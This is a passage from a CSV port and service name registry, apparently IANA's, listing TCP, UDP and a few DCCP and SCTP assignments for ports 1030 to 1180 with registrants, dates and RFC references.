Server,[Anders_Borg],[Anders_Borg],2004-11,,,,, ,1030,,Reserved,,,,2013-05-24,,,,This entry is being removed on 2013-05-24. ,1031,,Reserved,,,,2013-05-24,,,,This entry is being removed on 2013-05-24. ,1032,,Reserved,,,,2013-05-24,,,,This entry is being removed on 2013-05-24. netinfo-local,1033,tcp,local netinfo port,[Marc_Majka],[Marc_Majka],2002-08,,,,, netinfo-local,1033,udp,local netinfo port,[Marc_Majka],[Marc_Majka],2002-08,,,,, activesync,1034,tcp,ActiveSync Notifications,[Sandra_Vargas],[Sandra_Vargas],2003-03,,,,, activesync,1034,udp,ActiveSync Notifications,[Sandra_Vargas],[Sandra_Vargas],2003-03,,,,, mxxrlogin,1035,tcp,MX-XR RPC,[Arnold_E_Mauer],[Arnold_E_Mauer],2003-04,,,,, mxxrlogin,1035,udp,MX-XR RPC,[Arnold_E_Mauer],[Arnold_E_Mauer],2003-04,,,,, nsstp,1036,tcp,Nebula Secure Segment Transfer Protocol,[Steve_Ravida],[Steve_Ravida],,,,,, nsstp,1036,udp,Nebula Secure Segment Transfer Protocol,[Steve_Ravida],[Steve_Ravida],,,,,, ams,1037,tcp,AMS,[Ronald_R_Ohmer],[Ronald_R_Ohmer],2004-02,,,,, ams,1037,udp,AMS,[Ronald_R_Ohmer],[Ronald_R_Ohmer],2004-02,,,,, mtqp,1038,tcp,Message Tracking Query Protocol,,,,,[RFC3887],,, mtqp,1038,udp,Message Tracking Query Protocol,,,,,[RFC3887],,, sbl,1039,tcp,Streamlined Blackhole,[Jonathan_A_Zdziaras],[Jonathan_A_Zdziaras],2004-11,,,,, sbl,1039,udp,Streamlined Blackhole,[Jonathan_A_Zdziaras],[Jonathan_A_Zdziaras],2004-11,,,,, netarx,1040,tcp,Netarx Netcare,[Sandy_Kronenberg],[Sandy_Kronenberg],2008-04-03,,,,, netarx,1040,udp,Netarx Netcare,[Sandy_Kronenberg],[Sandy_Kronenberg],2008-04-03,,,,, danf-ak2,1041,tcp,AK2 Product,[Karl_Palsson],[Karl_Palsson],2004-11,,,,, danf-ak2,1041,udp,AK2 Product,[Karl_Palsson],[Karl_Palsson],2004-11,,,,, afrog,1042,tcp,Subnet Roaming,[Michael_Chapman],[Michael_Chapman],2004-11,,,,, afrog,1042,udp,Subnet Roaming,[Michael_Chapman],[Michael_Chapman],2004-11,,,,, boinc-client,1043,tcp,BOINC Client Control,[David_Anderson],[David_Anderson],2004-11,,,,, boinc-client,1043,udp,BOINC Client Control,[David_Anderson],[David_Anderson],2004-11,,,,, dcutility,1044,tcp,Dev Consortium Utility,[Chris_Ryland],[Chris_Ryland],2004-11,,,,, dcutility,1044,udp,Dev Consortium Utility,[Chris_Ryland],[Chris_Ryland],2004-11,,,,, fpitp,1045,tcp,Fingerprint Image Transfer Protocol,[Steven_Fields],[Steven_Fields],2002-02,,,,, fpitp,1045,udp,Fingerprint Image Transfer Protocol,[Steven_Fields],[Steven_Fields],2002-02,,,,, wfremotertm,1046,tcp,WebFilter Remote Monitor,[Tim_Morgan],[Tim_Morgan],2004-11,,,,, wfremotertm,1046,udp,WebFilter Remote Monitor,[Tim_Morgan],[Tim_Morgan],2004-11,,,,, neod1,1047,tcp,Sun's NEO Object Request Broker,,,,,,,, neod1,1047,udp,Sun's NEO Object Request Broker,,,,,,,, neod2,1048,tcp,Sun's NEO Object Request Broker,[Rohit_Garg],[Rohit_Garg],,,,,, neod2,1048,udp,Sun's NEO Object Request Broker,[Rohit_Garg],[Rohit_Garg],,,,,, td-postman,1049,tcp,Tobit David Postman VPMN,[Franz_Josef_Leuders],[Franz_Josef_Leuders],,,,,, td-postman,1049,udp,Tobit David Postman VPMN,[Franz_Josef_Leuders],[Franz_Josef_Leuders],,,,,, cma,1050,tcp,CORBA Management Agent,[Ramy_Zaarour],[Ramy_Zaarour],,,,,, cma,1050,udp,CORBA Management Agent,[Ramy_Zaarour],[Ramy_Zaarour],,,,,, optima-vnet,1051,tcp,Optima VNET,[Ralf_Doewich],[Ralf_Doewich],,,,,, optima-vnet,1051,udp,Optima VNET,[Ralf_Doewich],[Ralf_Doewich],,,,,, ddt,1052,tcp,Dynamic DNS Tools,[Remi_Lefebvre],[Remi_Lefebvre],,,,,, ddt,1052,udp,Dynamic DNS Tools,[Remi_Lefebvre],[Remi_Lefebvre],,,,,, remote-as,1053,tcp,Remote Assistant (RA),[Roman_Kriis],[Roman_Kriis],,,,,Unauthorized Use Known on port 1053, remote-as,1053,udp,Remote Assistant (RA),[Roman_Kriis],[Roman_Kriis],,,,,, brvread,1054,tcp,BRVREAD,[A_Boninn],[A_Boninn],,,,,, brvread,1054,udp,BRVREAD,[A_Boninn],[A_Boninn],,,,,, ansyslmd,1055,tcp,ANSYS - License Manager,[Suzanne_Lorrin],[Suzanne_Lorrin],,,,,, ansyslmd,1055,udp,ANSYS - License Manager,[Suzanne_Lorrin],[Suzanne_Lorrin],,,,,, vfo,1056,tcp,VFO,[Anthony_Gonzalez],[Anthony_Gonzalez],,,,,, vfo,1056,udp,VFO,[Anthony_Gonzalez],[Anthony_Gonzalez],,,,,, startron,1057,tcp,STARTRON,[Markus_Sabadello],[Markus_Sabadello],,,,,, startron,1057,udp,STARTRON,[Markus_Sabadello],[Markus_Sabadello],,,,,, nim,1058,tcp,nim,,,,,,,, nim,1058,udp,nim,,,,,,,, nimreg,1059,tcp,nimreg,[Robert_Gordon],[Robert_Gordon],,,,,, nimreg,1059,udp,nimreg,[Robert_Gordon],[Robert_Gordon],,,,,, polestar,1060,tcp,POLESTAR,[Masakuni_Okada],[Masakuni_Okada],,,,,, polestar,1060,udp,POLESTAR,[Masakuni_Okada],[Masakuni_Okada],,,,,, kiosk,1061,tcp,KIOSK,[Ken_Ksiazek],[Ken_Ksiazek],,,,,, kiosk,1061,udp,KIOSK,[Ken_Ksiazek],[Ken_Ksiazek],,,,,, veracity,1062,tcp,Veracity,[Ross_Williams],[Ross_Williams],,,,,, veracity,1062,udp,Veracity,[Ross_Williams],[Ross_Williams],,,,,, kyoceranetdev,1063,tcp,KyoceraNetDev,[Shigenaka_Kanemitsu],[Shigenaka_Kanemitsu],,,,,, kyoceranetdev,1063,udp,KyoceraNetDev,[Shigenaka_Kanemitsu],[Shigenaka_Kanemitsu],,,,,, jstel,1064,tcp,JSTEL,[Duane_Kiser],[Duane_Kiser],,,,,, jstel,1064,udp,JSTEL,[Duane_Kiser],[Duane_Kiser],,,,,, syscomlan,1065,tcp,SYSCOMLAN,[Alexandre_Lechenne],[Alexandre_Lechenne],2008-12-10,,,,, syscomlan,1065,udp,SYSCOMLAN,[Alexandre_Lechenne],[Alexandre_Lechenne],2008-12-10,,,,, fpo-fns,1066,tcp,FPO-FNS,[Jens_Klose],[Jens_Klose],,,,,, fpo-fns,1066,udp,FPO-FNS,[Jens_Klose],[Jens_Klose],,,,,, instl-boots,1067,tcp,"Installation Bootstrap Proto. Serv. IANA assigned this well-formed service name as a replacement for ""instl_boots"".",,,,,,,, instl_boots,1067,tcp,Installation Bootstrap Proto. Serv.,,,,,,,,"This entry is an alias to ""instl-boots"". This entry is now historic, not usable for use with many common service discovery mechanisms." instl-boots,1067,udp,"Installation Bootstrap Proto. Serv. IANA assigned this well-formed service name as a replacement for ""instl_boots"".",,,,,,,, instl_boots,1067,udp,Installation Bootstrap Proto. Serv.,,,,,,,,"This entry is an alias to ""instl-boots"". This entry is now historic, not usable for use with many common service discovery mechanisms." instl-bootc,1068,tcp,"Installation Bootstrap Proto. Cli. IANA assigned this well-formed service name as a replacement for ""instl_bootc"".",[David_Arko],[David_Arko],,,,,, instl_bootc,1068,tcp,Installation Bootstrap Proto. Cli.,[David_Arko],[David_Arko],,,,,,"This entry is an alias to ""instl-bootc"". This entry is now historic, not usable for use with many common service discovery mechanisms." instl-bootc,1068,udp,"Installation Bootstrap Proto. Cli. IANA assigned this well-formed service name as a replacement for ""instl_bootc"".",[David_Arko],[David_Arko],,,,,, instl_bootc,1068,udp,Installation Bootstrap Proto. Cli.,[David_Arko],[David_Arko],,,,,,"This entry is an alias to ""instl-bootc"". This entry is now historic, not usable for use with many common service discovery mechanisms." cognex-insight,1069,tcp,COGNEX-INSIGHT,[Steve_Olson],[Steve_Olson],,,,,, cognex-insight,1069,udp,COGNEX-INSIGHT,[Steve_Olson],[Steve_Olson],,,,,, gmrupdateserv,1070,tcp,GMRUpdateSERV,[Steve_Kellogg],[Steve_Kellogg],,,,,, gmrupdateserv,1070,udp,GMRUpdateSERV,[Steve_Kellogg],[Steve_Kellogg],,,,,, bsquare-voip,1071,tcp,BSQUARE-VOIP,[Yen_Lee],[Yen_Lee],,,,,, bsquare-voip,1071,udp,BSQUARE-VOIP,[Yen_Lee],[Yen_Lee],,,,,, cardax,1072,tcp,CARDAX,[Charles_Oram],[Charles_Oram],,,,,, cardax,1072,udp,CARDAX,[Charles_Oram],[Charles_Oram],,,,,, bridgecontrol,1073,tcp,Bridge Control,[Andy_Heron],[Andy_Heron],,,,,, bridgecontrol,1073,udp,Bridge Control,[Andy_Heron],[Andy_Heron],,,,,, warmspotMgmt,1074,tcp,Warmspot Management Protocol,[Robert_C_Henningsga],[Robert_C_Henningsga],,,,,, warmspotMgmt,1074,udp,Warmspot Management Protocol,[Robert_C_Henningsga],[Robert_C_Henningsga],,,,,, rdrmshc,1075,tcp,RDRMSHC,[Ericko_Shimada],[Ericko_Shimada],,,,,, rdrmshc,1075,udp,RDRMSHC,[Ericko_Shimada],[Ericko_Shimada],,,,,, dab-sti-c,1076,tcp,DAB STI-C,[World_DAB],[World_DAB],,,,,, dab-sti-c,1076,udp,DAB STI-C,[World_DAB],[World_DAB],,,,,, imgames,1077,tcp,IMGames,[Jean_A_Ames],[Jean_A_Ames],,,,,, imgames,1077,udp,IMGames,[Jean_A_Ames],[Jean_A_Ames],,,,,, avocent-proxy,1078,tcp,Avocent Proxy Protocol,[Steven_W_Clark],[Steven_W_Clark],,,,,, avocent-proxy,1078,udp,Avocent Proxy Protocol,[Steven_W_Clark],[Steven_W_Clark],,,,,, asprovatalk,1079,tcp,ASPROVATalk,[Chiew_Farn_Chung],[Chiew_Farn_Chung],,,,,, asprovatalk,1079,udp,ASPROVATalk,[Chiew_Farn_Chung],[Chiew_Farn_Chung],,,,,, socks,1080,tcp,Socks,[Ying_Da_Lee],[Ying_Da_Lee],,,,,, socks,1080,udp,Socks,[Ying_Da_Lee],[Ying_Da_Lee],,,,,, pvuniwien,1081,tcp,PVUNIWIEN,[Peter_Lipp],[Peter_Lipp],,,,,, pvuniwien,1081,udp,PVUNIWIEN,[Peter_Lipp],[Peter_Lipp],,,,,, amt-esd-prot,1082,tcp,AMT-ESD-PROT,[AMTEC_S_p_A],[AMTEC_S_p_A],,,,,, amt-esd-prot,1082,udp,AMT-ESD-PROT,[AMTEC_S_p_A],[AMTEC_S_p_A],,,,,, ansoft-lm-1,1083,tcp,Anasoft License Manager,,,,,,,, ansoft-lm-1,1083,udp,Anasoft License Manager,,,,,,,, ansoft-lm-2,1084,tcp,Anasoft License Manager,,,,,,,, ansoft-lm-2,1084,udp,Anasoft License Manager,,,,,,,, webobjects,1085,tcp,Web Objects,[Andy_Belk],[Andy_Belk],,,,,, webobjects,1085,udp,Web Objects,[Andy_Belk],[Andy_Belk],,,,,, cplscrambler-lg,1086,tcp,CPL Scrambler Logging,,,,,,,, cplscrambler-lg,1086,udp,CPL Scrambler Logging,,,,,,,, cplscrambler-in,1087,tcp,CPL Scrambler Internal,,,,,,,, cplscrambler-in,1087,udp,CPL Scrambler Internal,,,,,,,, cplscrambler-al,1088,tcp,CPL Scrambler Alarm Log,[Richard_Corn],[Richard_Corn],,,,,, cplscrambler-al,1088,udp,CPL Scrambler Alarm Log,[Richard_Corn],[Richard_Corn],,,,,, ff-annunc,1089,tcp,FF Annunciation,,,,,,,, ff-annunc,1089,udp,FF Annunciation,,,,,,,, ff-fms,1090,tcp,FF Fieldbus Message Specification,,,,,,,, ff-fms,1090,udp,FF Fieldbus Message Specification,,,,,,,, ff-sm,1091,tcp,FF System Management,[Fieldbus_Foundation],[Fieldbus_Foundation],,,,,, ff-sm,1091,udp,FF System Management,[Fieldbus_Foundation],[Fieldbus_Foundation],,,,,, obrpd,1092,tcp,Open Business Reporting Protocol,[William_Randolph_Roy],[William_Randolph_Roy],,,,,, obrpd,1092,udp,Open Business Reporting Protocol,[William_Randolph_Roy],[William_Randolph_Roy],,,,,, proofd,1093,tcp,PROOFD,,,,,,,, proofd,1093,udp,PROOFD,,,,,,,, rootd,1094,tcp,ROOTD,[Fons_Rademakers],[Fons_Rademakers],,,,,, rootd,1094,udp,ROOTD,[Fons_Rademakers],[Fons_Rademakers],,,,,, nicelink,1095,tcp,NICELink,[Jordi_Lisbona],[Jordi_Lisbona],,,,,, nicelink,1095,udp,NICELink,[Jordi_Lisbona],[Jordi_Lisbona],,,,,, cnrprotocol,1096,tcp,Common Name Resolution Protocol,[Michael_Mealling],[Michael_Mealling],,,,,, cnrprotocol,1096,udp,Common Name Resolution Protocol,[Michael_Mealling],[Michael_Mealling],,,,,, sunclustermgr,1097,tcp,Sun Cluster Manager,[Ashit_Patel],[Ashit_Patel],,,,,, sunclustermgr,1097,udp,Sun Cluster Manager,[Ashit_Patel],[Ashit_Patel],,,,,, rmiactivation,1098,tcp,RMI Activation,,,,,,,, rmiactivation,1098,udp,RMI Activation,,,,,,,, rmiregistry,1099,tcp,RMI Registry,[Mark_Hodapp],[Mark_Hodapp],,,,,, rmiregistry,1099,udp,RMI Registry,[Mark_Hodapp],[Mark_Hodapp],,,,,, mctp,1100,tcp,MCTP,[Vitaly_Revsin],[Vitaly_Revsin],,,,,, mctp,1100,udp,MCTP,[Vitaly_Revsin],[Vitaly_Revsin],,,,,, pt2-discover,1101,tcp,PT2-DISCOVER,[Ralph_Kammerlander],[Ralph_Kammerlander],,,,,, pt2-discover,1101,udp,PT2-DISCOVER,[Ralph_Kammerlander],[Ralph_Kammerlander],,,,,, adobeserver-1,1102,tcp,ADOBE SERVER 1,,,,,,,, adobeserver-1,1102,udp,ADOBE SERVER 1,,,,,,,, adobeserver-2,1103,tcp,ADOBE SERVER 2,[Frank_Soetebeer],[Frank_Soetebeer],,,,,, adobeserver-2,1103,udp,ADOBE SERVER 2,[Frank_Soetebeer],[Frank_Soetebeer],,,,,, xrl,1104,tcp,XRL,[Patrick_Robinson],[Patrick_Robinson],,,,,, xrl,1104,udp,XRL,[Patrick_Robinson],[Patrick_Robinson],,,,,, ftranhc,1105,tcp,FTRANHC,[Eriko_Shimada],[Eriko_Shimada],,,,,, ftranhc,1105,udp,FTRANHC,[Eriko_Shimada],[Eriko_Shimada],,,,,, isoipsigport-1,1106,tcp,ISOIPSIGPORT-1,,,,,,,, isoipsigport-1,1106,udp,ISOIPSIGPORT-1,,,,,,,, isoipsigport-2,1107,tcp,ISOIPSIGPORT-2,[Peter_Egli],[Peter_Egli],,,,,, isoipsigport-2,1107,udp,ISOIPSIGPORT-2,[Peter_Egli],[Peter_Egli],,,,,, ratio-adp,1108,tcp,ratio-adp,[Oliver_Thulke],[Oliver_Thulke],,,,,, ratio-adp,1108,udp,ratio-adp,[Oliver_Thulke],[Oliver_Thulke],,,,,, ,1109,,Reserved - IANA,,,,,,,, webadmstart,1110,tcp,Start web admin server,,,,,,,, nfsd-keepalive,1110,udp,Client status info,[Beth_Crespo],[Beth_Crespo],,,,,, lmsocialserver,1111,tcp,LM Social Server,[Ron_Lussier],[Ron_Lussier],,,,,, lmsocialserver,1111,udp,LM Social Server,[Ron_Lussier],[Ron_Lussier],,,,,, icp,1112,tcp,Intelligent Communication Protocol,[Mark_H_David],[Mark_H_David],,,,,, icp,1112,udp,Intelligent Communication Protocol,[Mark_H_David],[Mark_H_David],,,,,, ltp-deepspace,1113,tcp,Licklider Transmission Protocol,,,,,[RFC5326],,, ltp-deepspace,1113,udp,Licklider Transmission Protocol,,,,2014-02-21,[RFC5326][RFC7122],,, ltp-deepspace,1113,dccp,Licklider Transmission Protocol,,,2013-11-12,2014-02-21,[RFC7122],7107696,, mini-sql,1114,tcp,Mini SQL,[David_Hughes],[David_Hughes],,,,,, mini-sql,1114,udp,Mini SQL,[David_Hughes],[David_Hughes],,,,,, ardus-trns,1115,tcp,ARDUS Transfer,,,,,,,, ardus-trns,1115,udp,ARDUS Transfer,,,,,,,, ardus-cntl,1116,tcp,ARDUS Control,,,,,,,, ardus-cntl,1116,udp,ARDUS Control,,,,,,,, ardus-mtrns,1117,tcp,ARDUS Multicast Transfer,[Shinya_Abe],[Shinya_Abe],,,,,, ardus-mtrns,1117,udp,ARDUS Multicast Transfer,[Shinya_Abe],[Shinya_Abe],,,,,, sacred,1118,tcp,SACRED,,,,,[RFC3767],,, sacred,1118,udp,SACRED,,,,,[RFC3767],,, bnetgame,1119,tcp,Battle.net Chat/Game Protocol,,,,,,,, bnetgame,1119,udp,Battle.net Chat/Game Protocol,,,,,,,, bnetfile,1120,tcp,Battle.net File Transfer Protocol,[Domain_Tech],[Domain_Tech],2005-04,,,,, bnetfile,1120,udp,Battle.net File Transfer Protocol,[Domain_Tech],[Domain_Tech],2005-04,,,,, rmpp,1121,tcp,Datalode RMPP,[Dave_Ruedger],[Dave_Ruedger],2003-11,,,,, rmpp,1121,udp,Datalode RMPP,[Dave_Ruedger],[Dave_Ruedger],2003-11,,,,, availant-mgr,1122,tcp,availant-mgr,[Steven_Pelletier],[Steven_Pelletier],,,,,, availant-mgr,1122,udp,availant-mgr,[Steven_Pelletier],[Steven_Pelletier],,,,,, murray,1123,tcp,Murray,[Stu_Mark],[Stu_Mark],,,,,, murray,1123,udp,Murray,[Stu_Mark],[Stu_Mark],,,,,, hpvmmcontrol,1124,tcp,HP VMM Control,,,,,,,, hpvmmcontrol,1124,udp,HP VMM Control,,,,,,,, hpvmmagent,1125,tcp,HP VMM Agent,,,,,,,, hpvmmagent,1125,udp,HP VMM Agent,,,,,,,, hpvmmdata,1126,tcp,HP VMM Agent,[John_Morton],[John_Morton],2004-11,,,,, hpvmmdata,1126,udp,HP VMM Agent,[John_Morton],[John_Morton],2004-11,,,,, kwdb-commn,1127,tcp,KWDB Remote Communication,[Lal_Samuel_Varghese],[Lal_Samuel_Varghese],2005-08,,,,, kwdb-commn,1127,udp,KWDB Remote Communication,[Lal_Samuel_Varghese],[Lal_Samuel_Varghese],2005-08,,,,, saphostctrl,1128,tcp,SAPHostControl over SOAP/HTTP,,,,,,,, saphostctrl,1128,udp,SAPHostControl over SOAP/HTTP,,,,,,,, saphostctrls,1129,tcp,SAPHostControl over SOAP/HTTPS,[Muscarella_Fabrizio],[Muscarella_Fabrizio],2006-04,,,,, saphostctrls,1129,udp,SAPHostControl over SOAP/HTTPS,[Muscarella_Fabrizio],[Muscarella_Fabrizio],2006-04,,,,, casp,1130,tcp,CAC App Service Protocol,,,,,,,, casp,1130,udp,CAC App Service Protocol,,,,,,,, caspssl,1131,tcp,CAC App Service Protocol Encripted,[Enrique_Corujo],[Enrique_Corujo],2006-02,,,,, caspssl,1131,udp,CAC App Service Protocol Encripted,[Enrique_Corujo],[Enrique_Corujo],2006-02,,,,, kvm-via-ip,1132,tcp,KVM-via-IP Management Service,[Ian_Miller],[Ian_Miller],2006-03,,,,, kvm-via-ip,1132,udp,KVM-via-IP Management Service,[Ian_Miller],[Ian_Miller],2006-03,,,,, dfn,1133,tcp,Data Flow Network,[Dmitry_Obuvalin],[Dmitry_Obuvalin],2006-02,,,,, dfn,1133,udp,Data Flow Network,[Dmitry_Obuvalin],[Dmitry_Obuvalin],2006-02,,,,, aplx,1134,tcp,MicroAPL APLX,[Richard_Nabavi],[Richard_Nabavi],2006-02,,,,, aplx,1134,udp,MicroAPL APLX,[Richard_Nabavi],[Richard_Nabavi],2006-02,,,,, omnivision,1135,tcp,OmniVision Communication Service,[Serge_Vacquier],[Serge_Vacquier],2006-02,,,,, omnivision,1135,udp,OmniVision Communication Service,[Serge_Vacquier],[Serge_Vacquier],2006-02,,,,, hhb-gateway,1136,tcp,HHB Gateway Control,[Richard_Harwell],[Richard_Harwell],2006-02,,,,, hhb-gateway,1136,udp,HHB Gateway Control,[Richard_Harwell],[Richard_Harwell],2006-02,,,,, trim,1137,tcp,TRIM Workgroup Service,[Siva_Poobalasingam],[Siva_Poobalasingam],2006-03,,,,, trim,1137,udp,TRIM Workgroup Service,[Siva_Poobalasingam],[Siva_Poobalasingam],2006-03,,,,, encrypted-admin,1138,tcp,"encrypted admin requests IANA assigned this well-formed service name as a replacement for ""encrypted_admin"".",[Michael_Elizarov],[Michael_Elizarov],2007-01,,,,, encrypted_admin,1138,tcp,encrypted admin requests,[Michael_Elizarov],[Michael_Elizarov],2007-01,,,,,"This entry is an alias to ""encrypted-admin"". This entry is now historic, not usable for use with many common service discovery mechanisms." encrypted-admin,1138,udp,"encrypted admin requests IANA assigned this well-formed service name as a replacement for ""encrypted_admin"".",[Michael_Elizarov],[Michael_Elizarov],2007-01,,,,, encrypted_admin,1138,udp,encrypted admin requests,[Michael_Elizarov],[Michael_Elizarov],2007-01,,,,,"This entry is an alias to ""encrypted-admin"". This entry is now historic, not usable for use with many common service discovery mechanisms." evm,1139,tcp,Enterprise Virtual Manager,[Thomas_Hennessy],[Thomas_Hennessy],2007-10-04,,,,, evm,1139,udp,Enterprise Virtual Manager,[Thomas_Hennessy],[Thomas_Hennessy],2007-10-04,,,,, autonoc,1140,tcp,AutoNOC Network Operations Protocol,[Kyle_Lussier],[Kyle_Lussier],2005-12,,,,, autonoc,1140,udp,AutoNOC Network Operations Protocol,[Kyle_Lussier],[Kyle_Lussier],2005-12,,,,, mxomss,1141,tcp,User Message Service,[Chaoyi_Lang],[Chaoyi_Lang],2006-01,,,,, mxomss,1141,udp,User Message Service,[Chaoyi_Lang],[Chaoyi_Lang],2006-01,,,,, edtools,1142,tcp,User Discovery Service,[Lee_Dolson],[Lee_Dolson],2006-01,,,,, edtools,1142,udp,User Discovery Service,[Lee_Dolson],[Lee_Dolson],2006-01,,,,, imyx,1143,tcp,Infomatryx Exchange,[David_Walling],[David_Walling],2006-03,,,,, imyx,1143,udp,Infomatryx Exchange,[David_Walling],[David_Walling],2006-03,,,,, fuscript,1144,tcp,Fusion Script,[Peter_Loveday],[Peter_Loveday],2006-01,,,,, fuscript,1144,udp,Fusion Script,[Peter_Loveday],[Peter_Loveday],2006-01,,,,, x9-icue,1145,tcp,X9 iCue Show Control,[Brandon_Potter],[Brandon_Potter],2006-01,,,,, x9-icue,1145,udp,X9 iCue Show Control,[Brandon_Potter],[Brandon_Potter],2006-01,,,,, audit-transfer,1146,tcp,audit transfer,[Mark_Wahl],[Mark_Wahl],2005-11,,,,, audit-transfer,1146,udp,audit transfer,[Mark_Wahl],[Mark_Wahl],2005-11,,,,, capioverlan,1147,tcp,CAPIoverLAN,[Diego_Friedel],[Diego_Friedel],2005-11,,,,, capioverlan,1147,udp,CAPIoverLAN,[Diego_Friedel],[Diego_Friedel],2005-11,,,,, elfiq-repl,1148,tcp,Elfiq Replication Service,[Frederick_Parent],[Frederick_Parent],2005-11,,,,, elfiq-repl,1148,udp,Elfiq Replication Service,[Frederick_Parent],[Frederick_Parent],2005-11,,,,, bvtsonar,1149,tcp,BlueView Sonar Service,[Teledyne_BlueView_Inc],[Cat_Zimmermann],2005-11,2012-09-19,,,, bvtsonar,1149,udp,BlueView Sonar Service,[Teledyne_BlueView_Inc],[Cat_Zimmermann],2005-11,2012-09-19,,,, blaze,1150,tcp,Blaze File Server,[Curt_Schimmel],[Curt_Schimmel],2005-11,,,,, blaze,1150,udp,Blaze File Server,[Curt_Schimmel],[Curt_Schimmel],2005-11,,,,, unizensus,1151,tcp,Unizensus Login Server,[Dirk_Materlik],[Dirk_Materlik],2005-11,,,,, unizensus,1151,udp,Unizensus Login Server,[Dirk_Materlik],[Dirk_Materlik],2005-11,,,,, winpoplanmess,1152,tcp,Winpopup LAN Messenger,[Vitali_Fomine],[Vitali_Fomine],2005-11,,,,, winpoplanmess,1152,udp,Winpopup LAN Messenger,[Vitali_Fomine],[Vitali_Fomine],2005-11,,,,, c1222-acse,1153,tcp,ANSI C12.22 Port,,,,,[RFC6142],,, c1222-acse,1153,udp,ANSI C12.22 Port,,,,,[RFC6142],,, resacommunity,1154,tcp,Community Service,[Stephane_MONS],[Stephane_MONS],2005-09,,,,, resacommunity,1154,udp,Community Service,[Stephane_MONS],[Stephane_MONS],2005-09,,,,, nfa,1155,tcp,Network File Access,[James_Powell],[James_Powell],,,,,, nfa,1155,udp,Network File Access,[James_Powell],[James_Powell],,,,,, iascontrol-oms,1156,tcp,iasControl OMS,[Todd_Guay],[Todd_Guay],2004-11,,,,, iascontrol-oms,1156,udp,iasControl OMS,[Todd_Guay],[Todd_Guay],2004-11,,,,, iascontrol,1157,tcp,Oracle iASControl,[Todd_Guay],[Todd_Guay],2004-11,,,,, iascontrol,1157,udp,Oracle iASControl,[Todd_Guay],[Todd_Guay],2004-11,,,,, dbcontrol-oms,1158,tcp,dbControl OMS,[Todd_Guay],[Todd_Guay],2004-11,,,,, dbcontrol-oms,1158,udp,dbControl OMS,[Todd_Guay],[Todd_Guay],2004-11,,,,, oracle-oms,1159,tcp,Oracle OMS,[Todd_Guay],[Todd_Guay],2004-11,,,,, oracle-oms,1159,udp,Oracle OMS,[Todd_Guay],[Todd_Guay],2004-11,,,,, olsv,1160,tcp,DB Lite Mult-User Server,[Philip_Stephenson],[Philip_Stephenson],2005-08,,,,, olsv,1160,udp,DB Lite Mult-User Server,[Philip_Stephenson],[Philip_Stephenson],2005-08,,,,, health-polling,1161,tcp,Health Polling,,,,,,,, health-polling,1161,udp,Health Polling,,,,,,,, health-trap,1162,tcp,Health Trap,,,,,,,, health-trap,1162,udp,Health Trap,,,,,,,, sddp,1163,tcp,SmartDialer Data Protocol,[Lee_Griffiths],[Lee_Griffiths],2004-11,,,,, sddp,1163,udp,SmartDialer Data Protocol,[Lee_Griffiths],[Lee_Griffiths],2004-11,,,,, qsm-proxy,1164,tcp,QSM Proxy Service,[Norm_Lunde],[Norm_Lunde],2004-11,,,,, qsm-proxy,1164,udp,QSM Proxy Service,[Norm_Lunde],[Norm_Lunde],2004-11,,,,, qsm-gui,1165,tcp,QSM GUI Service,[Norm_Lunde],[Norm_Lunde],2004-11,,,,, qsm-gui,1165,udp,QSM GUI Service,[Norm_Lunde],[Norm_Lunde],2004-11,,,,, qsm-remote,1166,tcp,QSM RemoteExec,[Norm_Lunde],[Norm_Lunde],2004-11,,,,, qsm-remote,1166,udp,QSM RemoteExec,[Norm_Lunde],[Norm_Lunde],2004-11,,,,, cisco-ipsla,1167,tcp,Cisco IP SLAs Control Protocol,[Emmanuel_Tychon],[Emmanuel_Tychon],2006-03,,,,, cisco-ipsla,1167,udp,Cisco IP SLAs Control Protocol,[Emmanuel_Tychon],[Emmanuel_Tychon],2006-03,,,,, cisco-ipsla,1167,sctp,Cisco IP SLAs Control Protocol,[Emmanuel_Tychon],[Emmanuel_Tychon],2006-03,,,,, vchat,1168,tcp,VChat Conference Service,[Andreas_Wetzel],[Andreas_Wetzel],2002-09,,,,, vchat,1168,udp,VChat Conference Service,[Andreas_Wetzel],[Andreas_Wetzel],2002-09,,,,, tripwire,1169,tcp,TRIPWIRE,[Ed_Metcalf][Albert_Holt],[Ed_Metcalf][Albert_Holt],,,,,, tripwire,1169,udp,TRIPWIRE,[Ed_Metcalf][Albert_Holt],[Ed_Metcalf][Albert_Holt],,,,,, atc-lm,1170,tcp,AT+C License Manager,[Peter_Schafer],[Peter_Schafer],2004-02,,,,, atc-lm,1170,udp,AT+C License Manager,[Peter_Schafer],[Peter_Schafer],2004-02,,,,, atc-appserver,1171,tcp,AT+C FmiApplicationServer,[Peter_Schafer],[Peter_Schafer],2004-02,,,,, atc-appserver,1171,udp,AT+C FmiApplicationServer,[Peter_Schafer],[Peter_Schafer],2004-02,,,,, dnap,1172,tcp,DNA Protocol,[David_McLaughlin],[David_McLaughlin],2004-11,,,,, dnap,1172,udp,DNA Protocol,[David_McLaughlin],[David_McLaughlin],2004-11,,,,, d-cinema-rrp,1173,tcp,D-Cinema Request-Response,[Robert_Baldwin],[Robert_Baldwin],2004-11,,,,, d-cinema-rrp,1173,udp,D-Cinema Request-Response,[Robert_Baldwin],[Robert_Baldwin],2004-11,,,,, fnet-remote-ui,1174,tcp,FlashNet Remote Admin,[Terry_Smyth],[Terry_Smyth],2004-11,,,,, fnet-remote-ui,1174,udp,FlashNet Remote Admin,[Terry_Smyth],[Terry_Smyth],2004-11,,,,, dossier,1175,tcp,Dossier Server,[Rob_Minerick],[Rob_Minerick],2004-11,,,,, dossier,1175,udp,Dossier Server,[Rob_Minerick],[Rob_Minerick],2004-11,,,,, indigo-server,1176,tcp,Indigo Home Server,[Matt_Bendiksen],[Matt_Bendiksen],2004-11,,,,, indigo-server,1176,udp,Indigo Home Server,[Matt_Bendiksen],[Matt_Bendiksen],2004-11,,,,, dkmessenger,1177,tcp,DKMessenger Protocol,[Douglas_Kadlecek],[Douglas_Kadlecek],2004-11,,,,, dkmessenger,1177,udp,DKMessenger Protocol,[Douglas_Kadlecek],[Douglas_Kadlecek],2004-11,,,,, sgi-storman,1178,tcp,SGI Storage Manager,[Greg_Banks],[Greg_Banks],2004-11,,,,, sgi-storman,1178,udp,SGI Storage Manager,[Greg_Banks],[Greg_Banks],2004-11,,,,, b2n,1179,tcp,Backup To Neighbor,[Thomas_Fok],[Thomas_Fok],2004-11,,,,, b2n,1179,udp,Backup To Neighbor,[Thomas_Fok],[Thomas_Fok],2004-11,,,,, mc-client,1180,tcp,Millicent Client Proxy,[Steve_Glassman],[Steve_Glassman],,,,,, mc-client,1180,udp,Millicent Client 